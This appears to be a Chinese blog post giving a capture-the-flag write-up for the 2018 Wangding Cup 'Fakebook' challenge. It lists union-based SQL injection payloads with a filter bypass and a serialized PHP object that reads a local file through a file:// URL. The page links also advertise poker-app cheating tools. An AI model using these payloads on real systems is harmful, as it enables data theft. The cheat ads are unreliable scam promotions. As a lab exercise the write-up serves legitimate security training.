[网鼎杯 2018]Fakebook1
创始人
2024-11-13 07:35:42
0

打开题目

先创建用户,登录试试

观察网址,这是一道注入的题目

测试注入列数
说明注入列数为4

测试注入点
union select 被过滤

替代?no=0 union all select 1,2,3, 4 %23

2是注入点

爆数据库

?no=0 union all select 1,group_concat(schema_name),3, 4 from
information_schema.schemata %23

爆表名

?no=0 union all select 1,group_concat(table_name),3, 4 from
information_schema.tables where table_schema=‘fakebook’ # 

爆字段

?no=0 union all select 1,group_concat(column_name),3, 4 from
information_schema.columns where table_name=‘users’ #

爆数据

?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #

构造序列化结果
data中的数据

?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #

最后查看源码,看到base64,解码得到flag

上一篇:四分钟了解!wpk微扑克其实真的是有挂的(透视作弊)wepOKer能透视的(有挂手段)

下一篇:后表观遗传学时代如何开展DNA甲基化研究?

相关内容

热门资讯

2分钟德州透视挂!hhpoke... 2分钟德州透视挂!hhpoker开挂教程,德州透视插件,详细教程(有挂功能)1、完成德州透视插件透视...
九分钟开辅助!wepoker辅... 九分钟开辅助!wepoker辅助软件价格(透视底牌)详细辅助程序(本来是真的有挂)1、任何wepok...
9分钟透视插件!hh poke... 9分钟透视插件!hh poker软件,hhpoker是正品吗,详细教程(有挂智能)1、hh poke...
7分钟插件辅助!wepoker... 7分钟插件辅助!wepoker买钻石有用吗(透视底牌)详细辅助插件(果然是有挂)7分钟插件辅助!we...
八分钟作弊实战!hhpoker... 八分钟作弊实战!hhpoker脚本,hhpoker辅助靠谱吗,详细教程(有挂安装)1、完成hhpok...
二分钟苹果版!wepoker有... 二分钟苹果版!wepoker有辅助器吗(透视底牌)详细辅助免费(切实真的是有挂)1、点击下载安装,插...
八分钟破解工具!德州透视hhp... 八分钟破解工具!德州透视hhpoker,hh poker辅助器先试用,详细教程(有挂插件)1、该软件...
二分钟作弊!wepoker私人... 二分钟作弊!wepoker私人局可以透视(透视底牌)详细辅助作弊器(本来真的有挂);暗藏猫腻,小编详...
五分钟外挂!德扑HHpoker... 五分钟外挂!德扑HHpoker有挂吗(透视脚本)详细辅助助手(确实真的是有挂)1、任何ai辅助神器的...
5分钟新号!wepoker透视... 5分钟新号!wepoker透视器免费(透视底牌)详细辅助外挂(确实是真的有挂)1、打开软件启动之后找...